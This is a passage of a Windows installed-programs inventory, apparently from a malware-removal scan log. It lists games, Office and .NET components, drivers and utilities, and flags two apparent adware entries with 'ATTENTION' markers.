CCC Help Danish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Dutch (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help English (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Finnish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help French (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help German (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Greek (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Italian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Japanese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Korean (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Polish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Russian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Spanish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Swedish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Thai (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Turkish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
ccc-core-static (x32 Version: 2010.0421.657.10561 - Ihr Firmenname) Hidden
ccc-utility64 (Version: 2010.0421.657.10561 - ATI) Hidden
CDDRV_Installer (Version: 4.60 - Logitech) Hidden
Cheat Engine 6.2 (HKLM-x32\...\Cheat Engine 6.2_is1) (Version:  - Dark Byte)
Cheat Engine 6.3 (HKLM-x32\...\Cheat Engine 6.3_is1) (Version:  - Cheat Engine)
Citrix online plug-in - web (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 12.0.0.6410 - Citrix Systems, Inc.)
Citrix online plug-in (DV) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
Citrix online plug-in (HDX) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
Citrix online plug-in (USB) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
Citrix online plug-in (Web) (x32 Version: 12.0.0.6410 - Citrix Systems, Inc.) Hidden
CLIP STUDIO PAINT (HKLM-x32\...\{4B0AD476-DE95-4293-B437-BE2511DE74B6}) (Version: 1.2.0 - CELSYS)
Clone Wars (HKCU\...\SOE-Clone Wars) (Version:  - Sony Online Entertainment)
Command & Conquer 3 (HKLM-x32\...\{B0C30E93-D3D9-4F04-A2AC-54749B573275}) (Version: 1.00.0000 - Electronic Arts Inc.)
Command & Conquer 3 Kane's Wrath™ Worldbuilder (HKLM-x32\...\{44C934E4-6610-43D4-8E9B-49F30785013A}) (Version: 1.0 - Electronic Arts)
Command & Conquer™ 3: Kane's Wrath (HKLM-x32\...\{CC2422C9-F7B5-4175-B295-5EC2283AA674}) (Version: 1.00.0000 - Electronic Arts Inc.)
Command & Conquer™ 4 Tiberian Twilight (HKLM-x32\...\{82696435-8572-4D8B-A230-D1AA567D0F0F}) (Version: 1.0.0.0 - Electronic Arts)
Coole Schule! 4. Klasse (HKLM-x32\...\{2C03B8FF-A0CD-4F7D-A0E1-597FEDF77CAB}) (Version: 1.1 - )
Coole Schule! 5. Klasse (HKLM-x32\...\{C3A5EE5D-EB16-4431-9D39-BBB3B404CC80}) (Version: 1.1 - )
Coole Schule! 6. Klasse (HKLM-x32\...\{8019A3DA-B020-4802-8140-2FC550E73AC8}) (Version: 1.1 - )
Counter-Strike 1.6 (HKLM-x32\...\{9ABFB92D-93DA-49EE-8ABF-F8195DE45CA9}) (Version: 1.6 - )
CSM Play v1.0.1 (HKLM-x32\...\CSM Play v1.0.1_is1) (Version:  - VNG Corporation.)
CyberLink YouCam 6 (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.2326.0 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{2A07A3D4-F6CA-4EEB-9576-3A6AC8A736CE}) (Version:  - Microsoft)
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{2A07A3D4-F6CA-4EEB-9576-3A6AC8A736CE}) (Version:  - Microsoft)
Dota 2 (HKLM-x32\...\Steam App 570) (Version:  - Valve)
Dream Day First Home (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
EA Installer (HKLM-x32\...\EA Installer.-1797597899) (Version: 2.3.0.74 - Electronic Arts, Inc.)
erLT (x32 Version: 1.20.0137 - Logitech, Inc.) Hidden
eSobi v2 (HKLM-x32\...\InstallShield_{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.)
eSobi v2 (x32 Version: 2.0.4.000274 - esobi Inc.) Hidden
Farm Frenzy 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11531173}) (Version:  - Oberon Media)
Fotogalerie (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Free YouTube to MP3 Converter version 3.10.15.1228 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version:  - DVDVideoSoft Ltd.)
Freemake Audio Converter Version 1.1.0 (HKLM-x32\...\Freemake Audio Converter_is1) (Version: 1.1.0 - Ellora Assets Corporation)
FUSSBALL MANAGER 11 (HKLM-x32\...\FUSSBALL MANAGER 11) (Version:  - Electronic Arts)
FUSSBALL MANAGER 12 (HKLM-x32\...\FUSSBALL MANAGER 12) (Version: 1.0.0.3 - Electronic Arts)
Galapago (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version:  - Oberon Media)
GameSpy Comrade (HKLM-x32\...\{5F4C776F-8CBD-4C4F-892F-B568ABDD70C8}) (Version: 1.5.0.156 - GameSpy)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 36.0.1985.143 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Haufe iDesk-Browser (HKLM-x32\...\{0F32914F-A633-4516-B531-7084C8F19F93}) (Version: 10.10.14.0000 - Haufe-Lexware GmbH & Co. KG)
Haufe iDesk-Service (HKLM-x32\...\{27F10580-E040-11DF-8C28-005056B12123}) (Version: 10.10.25.7810 - Haufe)
Heroes of Hellas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113786380}) (Version:  - Oberon Media)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series - Grundlegende Software für das Gerät (HKLM\...\{B2B8577D-EECF-4062-BEB7-A8BE3FD679ED}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Hilfe (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
HP Update (HKLM-x32\...\{85DF2EED-08BC-46FB-90DA-28B0D0A8E8A8}) (Version: 5.003.000.004 - Hewlett-Packard)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated)
iExplorer 3.3.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version:  - Macroplant LLC)
iFunbox (v2.8.2414.748), iFunbox DevTeam (HKLM-x32\...\iFunbox_is1) (Version: v2.8.2414.748 - )
iFunBox 2013 (v3.0.494.416), iFunbox DevTeam (HKLM-x32\...\iFunBox 2013_is1) (Version: v3.0.494.416 - )
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM-x32\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.00.01.1002 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{5A68A656-979F-4168-8795-E2E368AA4DC2}) (Version: 11.2.2.3 - Apple Inc.)
Java 7 Update 51 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417051FF}) (Version: 7.0.510 - Oracle)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.8 - Sun Microsystems, Inc.) Hidden
Junk Mail filter update (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
KhalInstallWrapper (Version: 2.00.0000 - Logitech) Hidden
K-Lite Codec Pack 9.3.0 (Basic) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 9.3.0 - )
Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.7 - Acer Inc.)
Lexware buchhalter 2011 (HKLM-x32\...\{2B443CC6-7EBE-43FF-91A8-6AC3B5A085FD}) (Version: 16.30.00.0179 - Haufe-Lexware GmbH & Co.KG)
Lexware Elster (HKLM-x32\...\{C8E00BC8-D619-4081-813A-6B5BCC846534}) (Version: 9.10.00.0041 - Lexware GmbH & Co. KG)
Lexware Info Service (HKLM-x32\...\{15B2BC56-D179-4450-84B9-7A8D7F4CE1B9}) (Version: 2.70.00.0081 - Haufe-Lexware GmbH & Co.KG)
Logitech SetPoint (HKLM-x32\...\{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}) (Version: 4.80 - Logitech)
Macromedia Extension Manager (HKLM-x32\...\{5546CDB5-2CE2-498B-B059-5B3BF81FC41F}) (Version: 1.7.240 - Macromedia, Inc.)
Macromedia Flash 8 (HKLM-x32\...\{2BD5C305-1B27-4D41-B690-7A61172D2FEB}) (Version: 8.00.0000 - Macromedia)
Macromedia Flash 8 Video Encoder (HKLM-x32\...\{8BF2C401-02CE-424D-BC26-6C4F9FB446B6}) (Version: 1.00.0000 - Macromedia)
Macromedia Flash Player 8 (HKLM-x32\...\{885A63EA-382B-4DD4-A755-14809B8557D6}) (Version: 8.0.22.0 - Macromedia)
Macromedia Flash Player 8 Plugin (HKLM-x32\...\{91057632-CA70-413C-B628-2D3CDBBB906B}) (Version: 8.0.22.0 - Macromedia)
MediaShow Espresso (x32 Version: 5.5.1403_23691 - CyberLink Corp.) Hidden
Merriam Websters Spell Jam (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112662477}) (Version:  - Oberon Media)
Microsoft .NET Framework 1.1 (HKLM-x32\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (x32 Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Default Manager (x32 Version: 2.2.114.0 - Microsoft Corporation) Hidden
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Access MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Project MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Project Professional 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Outlook Hotmail Connector 64-Bit (HKLM\...\{95140000-007A-0407-1000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 64-bit (HKLM\...\{95140000-007D-0409-1000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Project Professional 2010 (HKLM\...\Office14.PRJPROR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft WSE 3.0 Runtime (HKLM-x32\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Mobile Connection Manager (HKLM-x32\...\o2DE) (Version:  - Mobile Connection Manager)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 8.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 8.0 (x86 de)) (Version: 8.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT Redists (Version: 1.0 - Sony Creative Software Inc.) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyWinLocker (x32 Version: 3.1.212.0 - Egis Technology Inc.) Hidden
MyWinLocker Suite (HKLM-x32\...\InstallShield_{738BF5C3-AF7B-4BB0-B7EF-E505EFC756BE}) (Version: 3.1.212.0 - Egis Technology Inc.)
MyWinLocker Suite (x32 Version: 3.1.212.0 - Egis Technology Inc.) Hidden
NCDownloader (HKLM-x32\...\{0F44DC3F-6E62-4961-A14B-95323C512F9B}_is1) (Version: 1.0 - Solibo Ltd.) <==== ATTENTION
NhacCuaTui (HKLM-x32\...\{2343FB63-1E8C-4E33-8283-B0078AD79430}) (Version: 1.0.627.0 - NCT Corporation)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
NTI Backup Now 5 (HKLM-x32\...\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}) (Version: 5.1.2.630 - NewTech Infosystems)
NTI Backup Now Standard (x32 Version: 5.1.2.630 - NewTech Infosystems) Hidden
NTI Media Maker 8 (HKLM-x32\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6636 - NewTech Infosystems)
NTI Media Maker 8 (x32 Version: 8.0.12.6636 - NewTech Infosystems) Hidden
NVIDIA PhysX (HKLM-x32\...\{B83FC356-B7C0-441F-8A4D-D71E088E7974}) (Version: 9.09.0428 - NVIDIA Corporation)
Optical Drive Power Management (HKLM-x32\...\{AE09C972-EEB2-4DA5-8090-0FCF54576854}) (Version: 1.01.3007 - Acer Incorporated)
Overlord II (HKLM-x32\...\{E426CEC1-35C5-42BF-913E-6EF8F1211D01}) (Version: 1.0 - Codemasters)
Pando Media Booster (HKLM-x32\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.6.0.9 - Pando Networks Inc.)
PasswordBox (HKLM-x32\...\PasswordBox) (Version: 1.18.0.2194 - PasswordBox, Inc.)
PasswordBox Search (HKCU\...\PasswordBox Search) (Version:  - PasswordBox, Inc.)
Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Photo Transfer App (HKLM-x32\...\com.erclab.air.phototransferapp) (Version: 2.1.0 - UNKNOWN)
Photo Transfer App (x32 Version: 2.1.0 - UNKNOWN) Hidden
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.1 - Nikon)
PlanetSide 2 (HKCU\...\SOE-PlanetSide 2) (Version: 1.0.3.183 - Sony Online Entertainment)
Poker Pop (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111355427}) (Version:  - Oberon Media)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden
QuickSteuer Deluxe 2011 (HKLM-x32\...\{6BCC7669-A863-4C24-804B-9C811C102F71}) (Version: 17.07.00.0001 - Haufe-Lexware GmbH & Co.KG)
QuickSteuer DELUXE Wissens-Center 2011 (HKLM-x32\...\{0ABA2DC3-B67B-4D87-AB1B-EC5E9CDF24B3}) (Version: 17.10.0.0 - Haufe-Lexware GmbH & Co. KG)
QuickTime (HKLM-x32\...\{7BE15435-2D3E-4B58-867F-9C75BED0208C}) (Version: 7.71.80.42 - Apple Inc.)
Quyền Vương Online (HKLM-x32\...\{45CCF4CB-EB83-4CE9-9D57-4D95C94A45C9}_is1) (Version: 1.0 - PlayPark.vn)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6096 - Realtek Semiconductor Corp.)
Registry Reviver (HKLM\...\Registry Reviver) (Version: 3.0.1.108 - ReviverSoft LLC)
RPG MAKER VX Ace RTP (HKLM-x32\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Sandbox (HKLM-x32\...\Sandbox) (Version:  - )
savenshAriE (HKLM-x32\...\{62D82EC1-0D3A-DF54-8E3E-07E1337A5311}) (Version: 3.2.0.1537 - savenshAre) <==== ATTENTION
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{91140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{91140000-003B-0000-1000-0000000FF1CE}_Office14.PRJPROR_{DC528101-617D-4E9F-B131-F8F8C52E649B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Shredder (Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Shredder (x32 Version: 2.0.8.3 - Egis Technology Inc.) Hidden
Skype Click to Call (HKLM-x32\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.3.11079 - Skype Technologies S.A.)
Skype™ 6.18 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.18.106 - Skype Technologies S.A.)
SOE Web Installer (HKCU\...\SOE Web Installer) (Version: 1.0.3.171 - Sony Online Entertainment)
South Park The Stick of Truth - Update 1 version 1.0.1353 (HKLM-x32\...\{83736891-79AE-49BA-96F5-55DD6F2186AC}_is1) (Version: 1.0.1353 - Ubisoft)
Southpark Stick of Truth (HKLM-x32\...\U291dGhwYXJrU3RpY2tvZlRydXRo_is1) (Version: 1 - )
Spin & Win (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110300453}) (Version:  - Oberon Media)
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Star Wars Empire at War Forces of Corruption (HKLM-x32\...\{6592FDEC-2C1A-413A-9985-25FEC2F0848D}) (Version: 1.0 - LucasArts)
Star Wars Jedi Knight Jedi Academy (HKLM-x32\...\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}) (Version:  - )
Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.)
State of Decay - Breakdown (HKLM-x32\...\State of Decay - Breakdown_is1) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Studie zur Verbesserung von HP Photosmart 6510 series Produkten (HKLM\...\{D9710515-1C8F-4AF9-A61D-2E0287915B73}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 14.0.6.0 - Synaptics Incorporated)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.31064 - TeamViewer)
Telerik Control Panel (HKLM-x32\...\{BEB6277E-58FC-48C5-AA2E-D31E07451A9D}) (Version: 14.1.416.0 - Telerik AD)
Telerik JustDecompile Q1 2014 (HKLM-x32\...\{3FEC96B0-93E2-4E59-A7B5-29862E7D3B9D}) (Version: 14.1.225.0 - Telerik AD)
The Forest 1.0 (HKLM-x32\...\The Forest 1.0) (Version: 1.0 - Cat-A-Cat)
Tiny Download Manager (remove only) (HKLM-x32\...\TinyDM) (Version: 2 - TinyDM LTD)
UltraISO Premium V9.52 (HKLM-x32\...\UltraISO_is1) (Version:  - )
UniKey 4.0 RC2 (build 1101) (HKLM-x32\...\{AC006985-A51F-42AC-A7E9-5E66D8AC8063}_is1) (Version:  - Pham Kim Long)
Unity Web Player (All users) (HKLM-x32\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2473228) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2600217) (HKLM-x32\...\{8E34682C-8118-31F1-BC4C-98CD9675E1C2}.KB2600217) (Version: 1 - Microsoft Corporation)
